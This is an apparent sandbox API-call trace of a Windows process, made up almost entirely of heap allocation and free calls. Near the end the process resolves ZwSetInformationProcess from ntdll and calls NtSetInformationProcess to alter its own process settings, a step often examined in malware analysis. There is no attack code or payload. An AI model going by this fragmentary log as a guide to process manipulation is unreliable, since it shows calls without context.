RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9588 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0145.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0145.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13e8 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13e8 | out: hHeap=0x25c0000) returned 1 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9588 | out: hHeap=0x25c0000) returned 1 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0145.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a94c8 | out: hHeap=0x25c0000) returned 1 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a94e0 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9510 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13a8 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9528 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0145.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0145.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0145.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0145.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9498 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0145.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.378] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9498 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9528 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1388 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9510 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13a8 [0145.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a94e0 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1388 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a94c8 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0145.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9588 [0145.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9588 | out: hHeap=0x25c0000) returned 1 [0145.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a94c8 | out: hHeap=0x25c0000) returned 1 [0145.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1388 [0145.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0145.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13e8 [0145.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1418 [0145.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9510 | out: hHeap=0x25c0000) returned 1 [0145.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13a8 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9528 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a94e0 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9498 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13e8 | out: hHeap=0x25c0000) returned 1 [0145.381] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13e8 [0145.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9498 [0145.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a94e0 [0145.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9528 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9510 [0145.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a94c8 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9588 [0145.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0145.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9498 | out: hHeap=0x25c0000) returned 1 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9498 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9540 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95a0 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1388 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9630 [0145.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9630 | out: hHeap=0x25c0000) returned 1 [0145.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95a0 | out: hHeap=0x25c0000) returned 1 [0145.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9540 | out: hHeap=0x25c0000) returned 1 [0145.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9540 [0145.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95a0 [0145.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9630 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95e8 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9600 [0145.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0145.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9618 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9558 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0145.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0145.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0145.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9660 [0145.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9660 | out: hHeap=0x25c0000) returned 1 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9558 | out: hHeap=0x25c0000) returned 1 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9558 [0145.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0145.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9660 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1418 [0145.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1418 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9690 [0145.386] CharLowerBuffW (in: lpsz="none", cchLength=0x4 | out: lpsz="none") returned 0x4 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96c0 [0145.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96c0 | out: hHeap=0x25c0000) returned 1 [0145.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96c0 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0145.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13a8 [0145.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0145.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0145.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13a8 | out: hHeap=0x25c0000) returned 1 [0145.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13a8 [0145.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0145.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0145.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0145.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0145.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0145.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1448 [0145.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0145.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1448 | out: hHeap=0x25c0000) returned 1 [0145.388] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77130000 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1448 [0145.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZwSetInformationProcess", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0145.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZwSetInformationProcess", cchWideChar=24, lpMultiByteStr=0x2466d90, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZwSetInformationProcess", lpUsedDefaultChar=0x0) returned 24 [0145.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.389] GetProcAddress (hModule=0x77130000, lpProcName="ZwSetInformationProcess") returned 0x7714fb18 [0145.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0145.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1448 | out: hHeap=0x25c0000) returned 1 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1448 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1388 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1458 [0145.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0145.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1448 | out: hHeap=0x25c0000) returned 1 [0145.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) returned 1 [0145.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0145.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.390] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x21, ProcessInformation=0x24b1158, ProcessInformationLength=0x4) returned 0x0 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96f0 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1458 [0145.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96f0 | out: hHeap=0x25c0000) returned 1 [0145.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) returned 1 [0145.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96f0 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0145.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1458 [0145.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0145.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) returned 1 [0145.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96f0 | out: hHeap=0x25c0000) returned 1 [0145.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96f0 [0145.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0145.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9720 [0145.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1458 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9720 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0145.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0145.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9720 [0145.391] RtlAllocateHeap (HeapHandle=0x25c0000, 